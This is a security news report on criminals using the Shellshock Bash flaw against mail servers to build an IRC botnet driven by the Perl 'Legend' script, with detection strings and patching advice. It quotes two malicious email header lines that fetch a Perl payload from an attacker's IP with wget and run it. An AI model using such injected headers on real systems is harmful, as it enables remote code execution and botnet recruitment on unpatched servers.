Report: Criminals use Shellshock against mail servers to build botnet

Targeting message transfer agents (MTAs), and mail delivery agents (MDAs), criminals are using Shellshock as a means to create botnets. The process is slow, but working, thanks to unpatched installations of Bash or certain implementations of it.

When it was disclosed in September, Shellshock -- the common name given to a vulnerability in Bash that enables command execution -- impacted systems both large and small, creating ripples across the tech industry.

Vendors struggled to release and maintain patches. For several days after the initial disclosure, researchers found ways to bypass the fixes, leading to the publication of four additional CVE advisories related to the main flaw.

It didn't take long, days in fact, before criminals latched on to the issue. On September 27, researchers at FireEye released details on a number of proof-of-concept scripts related to Shellshock.

"We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it's only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise," FireEye wrote at the time.

How right they were. Among the findings from FireEye was a proof-of-concept script that created an IRC-based (Internet Relay Chat) botnet, capable of sending spam, initiating a DDoS attack, or performing remote command execution on the compromised host.

On Friday, CSO became aware of a Shellshock-based campaign targeting organizations in Europe and the United States. It spreads via email, using Shellshock exploitation code in the message header fields. If successful, it delivers a simple Perl script as the payload, which adds the host to a botnet commanded form IRC.

Subsequent investigation by CSO led to the discovery of one the IRC servers used to host the bots. Connected to this server was more than 160 compromised hosts as of October 24.


The Shellshock campaign targets mail servers, searching for vulnerable MTAs / MDAs. The messages themselves are blank, but the code needed to exploit the Shellshock vulnerability is placed into the message's headers.

The person(s) behind the spam blasts are including the following code in several message fields, including the "To:" field, "From:" field, "Subject" field, "Date:" field, "Message ID:" and others.

Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

A full list of the fields, with examples, are available here.

A sample of one of the email messages - complete with headers - is available here, thanks to Benjamin Sonntag, the co-founder of citizen advocacy group La Quadrature du Net.


The IRC server identified by CSO is just one of several. It's installed on a previously compromised Web server that exists on the OVH network, and is maintained by a French IT firm focusing network integration and information security.

While conducting research for this story, the person controlling the bots discovered us, and promptly issued a KLine, banning us from the server.

Given that the IRCd (IRC Daemon) exists on the compromised host and is accessed via Telnet (port 23); it's unlikely the firm is aware of the status of their server. CSO has contacted the IT firm, their web host, and OVH to report the matter.

NOTE:By the time this story went to press, none of those contacted had responded to the issue. The IRCd was off limits to us, but responded to pings. The domain serving the malicious payload was still active.

There is evidence of a second server, existing on a network in Germany, which hosted more than 600 bots earlier this month. The connection between this earlier server and the recently discovered server in France is the IRCd, network naming conventions, and the fact that the same people managed both (based on login details).

The following IP addresses have been linked to incidents leveraging Shellshock as an attack vector.

These addresses either hosted a malicious IRC network, or were used to deliver malicious payloads. In the attack examples seen by CSO, the host was called by IP directly over HTTP (port 80) via cURL. If a domain is used to resolve the host's IP, the attackers tend to use free services, such as

In addition to checking the server logs for the aforementioned IP addresses, administrators should also check to see if any unknown scripts are running on the server. The bots in this campaign are all managed by a Perl script, which will contain strings in its code that are easily found in a grep of the /tmp directory:

Legend Bot [2011]

Legend IRC [2010]


"Installing Mocks please wait"


The script that powers the botnet behind this recent campaign is called Legend, and it has existed for several years now. The Legend script is simplistic, but effective once installed on a system. It isn't designed to be clandestine, so it's often discovered during a scan of running processes, TMP directories, or network traffic.

With Legend, a compromised host can be called upon to do a number of things, including open a reverse shell, send spam, initiate a DDoS attack, scan a network with NMAP, or conduct basic Denial of Service via HTTP, TCP, UDP, or SQL. The script can also reveal sensitive information about the host, or turn it into a proxy.

Once installed, Legend will connect the compromised host to a pre-configured IRC server, where the attacker can issue commands individually or as a group. CSO has seen evidence of two Legend scripts circulating online. The source code for the first script, seen in late September and early October, is available here. The second, more recent script can be viewed here.

It's also worth noting that in separate, but related attacks, a second botnet script has been identified. The script, called "JST Perl IrcBot" in the headers, has many of the same functions as Legend. It was a suggested as a possible payload when someone on Reddit identified the same campaign that CSO was investigating.


The following MTAs / MDAs are directly impacted by Shellshock in some cases, depending on their configuration. The source link will open links to additional sources of information.

Courier Mail Server [Source]

Exim [Source]

QMail [Source] [Source]

Postfix [Source] / Procmail [Source]

There is at least one Shellshock exploit for Postfix circulating online, triggering the same attack as observed in this article The Procmail source link points to an additional possible attack vector.

Sendmail [Source]

Depending on how it is configured, Sendmail is vulnerable. This is especially true for web scripts that call Sendmail. One example of such a script is sendmail-wrapper, which logs and throttles email sent by PHP. It was patched against Shellshock shortly after it was disclosed.

Above all else, the most important mitigation step is patching Bash to ensure that systems are updated with the latest version. All major vendors and Linux distributions have released patches against Shellshock, including Red Hat, IBM, Juniper, Cisco, Debian, Ubuntu, VMware, McAfee, and HP.

Join the CSO newsletter!

Error: Please check your email address.

Tags VulnerabilitiesShellshockShellsecuritybotnetsspam attacksFireEyeExploits / vulnerabilitiesTarget

More about CourierCSODebianFireEyeHPJuniperLinuxRed HatTelnetTMPUbuntu

Show Comments

Featured Whitepapers

Editor's Recommendations

Solution Centres

Stories by Steve Ragan

Latest Videos

  • 150x50

    CSO Webinar: The Human Factor - Your people are your biggest security weakness

    ​Speakers: David Lacey, Researcher and former CISO Royal Mail David Turner - Global Risk Management Expert Mark Guntrip - Group Manager, Email Protection, Proofpoint

    Play Video

  • 150x50

    CSO Webinar: Current ransomware defences are failing – but machine learning can drive a more proactive solution

    Speakers • Ty Miller, Director, Threat Intelligence • Mark Gregory, Leader, Network Engineering Research Group, RMIT • Jeff Lanza, Retired FBI Agent (USA) • Andy Solterbeck, VP Asia Pacific, Cylance • David Braue, CSO MC/Moderator What to expect: ​Hear from industry experts on the local and global ransomware threat landscape. Explore a new approach to dealing with ransomware using machine-learning techniques and by thinking about the problem in a fundamentally different way. Apply techniques for gathering insight into ransomware behaviour and find out what elements must go into a truly effective ransomware defence. Get a first-hand look at how ransomware actually works in practice, and how machine-learning techniques can pick up on its activities long before your employees do.

    Play Video

  • 150x50

    CSO Webinar: Get real about metadata to avoid a false sense of security

    Speakers: • Anthony Caruana – CSO MC and moderator • Ian Farquhar, Worldwide Virtual Security Team Lead, Gigamon • John Lindsay, Former CTO, iiNet • Skeeve Stevens, Futurist, Future Sumo • David Vaile - Vice chair of APF, Co-Convenor of the Cyberspace Law And Policy Community, UNSW Law Faculty This webinar covers: - A 101 on metadata - what it is and how to use it - Insight into a typical attack, what happens and what we would find when looking into the metadata - How to collect metadata, use this to detect attacks and get greater insight into how you can use this to protect your organisation - Learn how much raw data and metadata to retain and how long for - Get a reality check on how you're using your metadata and if this is enough to secure your organisation

    Play Video

  • 150x50

    CSO Webinar: How banking trojans work and how you can stop them

    CSO Webinar: How banking trojans work and how you can stop them Featuring: • John Baird, Director of Global Technology Production, Deutsche Bank • Samantha Macleod, GM Cyber Security, ME Bank • Sherrod DeGrippo, Director of Emerging Threats, Proofpoint (USA)

    Play Video

  • 150x50

    IDG Live Webinar:The right collaboration strategy will help your business take flight

    Speakers - Mike Harris, Engineering Services Manager, Jetstar - Christopher Johnson, IT Director APAC, 20th Century Fox - Brent Maxwell, Director of Information Systems, THE ICONIC - IDG MC/Moderator Anthony Caruana

    Play Video

More videos

Blog Posts